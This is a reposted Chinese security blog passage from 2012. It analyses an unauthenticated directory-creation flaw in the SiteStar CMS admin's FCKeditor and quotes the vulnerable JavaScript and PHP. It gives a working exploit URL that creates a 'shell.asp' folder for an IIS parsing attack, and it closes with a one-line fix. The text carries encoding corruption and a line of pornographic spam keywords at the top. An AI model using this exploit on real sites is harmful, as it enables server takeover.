欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

建站之星全版本后臺(tái)通殺getshell的解析與解決方法

Drift’s Blog   發(fā)布時(shí)間:2012-06-29 16:21:06   作者:佚名   我要評(píng)論
建站之星全版本后臺(tái)通殺getshell的解析
找到一個(gè)fck改的編輯器,準(zhǔn)備用解析洞日之。

然后發(fā)現(xiàn)無(wú)法這玩意直接過(guò)濾了“.”創(chuàng)建不了解析文件夾,
反復(fù)試了幾次之后發(fā)現(xiàn)這個(gè)過(guò)濾是有延遲的。大概在0.1秒后 才會(huì)去掉。于是果斷查看源碼看函數(shù):

復(fù)制代碼
代碼如下:

function addSort(obj) {
$(obj).parent().find(‘span’).css(‘display’,'inline-block’);
$(obj).css(‘display’,'none’);
$(obj).parent().find(‘span > input:first’).focus();
}
function newDir(obj) {
var pth = $(obj).prev().attr(‘value’);
var basepth = $(‘#gtcurdir option:selected’).text();
if (pth.replace(/^\s+|\s+$/g,”).length == 0) { //這里對(duì)定義的PTH變量進(jìn)行了判斷,(“/^\s+|\s+$/g,”),思路是 判斷如果文本框內(nèi)不算以上字符 長(zhǎng)度等于0則繼續(xù)執(zhí)行.
alert(“請(qǐng)輸入字符”);
$(obj).prev().focus();
return false;
} else {
$.ajax({
type : “GET”,
dataType : “text”,
url : “../mkdir.ajax.php?basedir=”+basepth+”&newdir=”+pth,//這里直接發(fā)送url 基本類(lèi)型+新文件夾名+文件夾名。
success : function(response) {
switch (response) {
case ’0′:
$(obj).prev().val(”);
$(obj).parent().css(‘display’,'none’);
$(obj).parent().parent().find(‘a’).css(‘display’,'inline-block’);
$(‘<option value=”‘+basepth+pth+’/” selected=”true”>’+basepth+pth+’/</option>’).appendTo(‘#gtcurdir’);
break;
case ‘-1′:
alert(“文件夾已存在!”);
$(obj).prev().focus();
break;
case ‘-2′:
alert(“新建文件夾失??!”);
break;
}
},
error : function(response) {
alert(“請(qǐng)求失??!”);
return false;
}
});
}

看完函數(shù) 發(fā)現(xiàn)有一個(gè)很有意思的地方:
url : “../mkdir.ajax.php?basedir=”+basepth+”&newdir=”+pth,
這里直接post出去命令。那么我們可否構(gòu)造呢
于是查看了這個(gè)腳本的源碼:
<?php//?。。【谷粵](méi)有驗(yàn)證

復(fù)制代碼
代碼如下:

header(‘Conten-type:text/html; charset=UTF-8′);
define(‘SSFCK’, str_replace(“\\”, “/”, dirname(__FILE__)));
$adminRoot = str_replace(“\\”, “/”, substr(SSFCK, 0, -10));
define(‘SSROOT’, str_replace(“\\”, “/”, realpath($adminRoot.”/..”)));
$err = ’0′;
$basedir = trim($_GET['basedir']);//這里直接GET來(lái)自前面那個(gè)urlpost來(lái)的變量
$newdir = trim($_GET['newdir']);
// is or not exist dir
$hd = dir(“../../”.$basedir);
while(($path = $hd->read()) !== false) {
if ($path == $newdir) {
$err = ‘-1′;
break;
} else continue;
}
if ($err != ‘-1′) {
if (!mkdir(“../../{$basedir}{$newdir}”, 0755)) $err = ‘-2′;
}
echo $err;
?>

程序員果然天然呆,不驗(yàn)證登陸,這里不驗(yàn)證文件名,任憑urlpost任意信息。
到這里知道了程序漏洞所在。附上exp:
http:// /admin/fckeditor/mkdir.ajax.php?basedir=upload/image/&newdir=shell.asp
返回0則表示成功。
 修復(fù)方案:
對(duì)mkdir.ajax.php加驗(yàn)證

相關(guān)文章

最新評(píng)論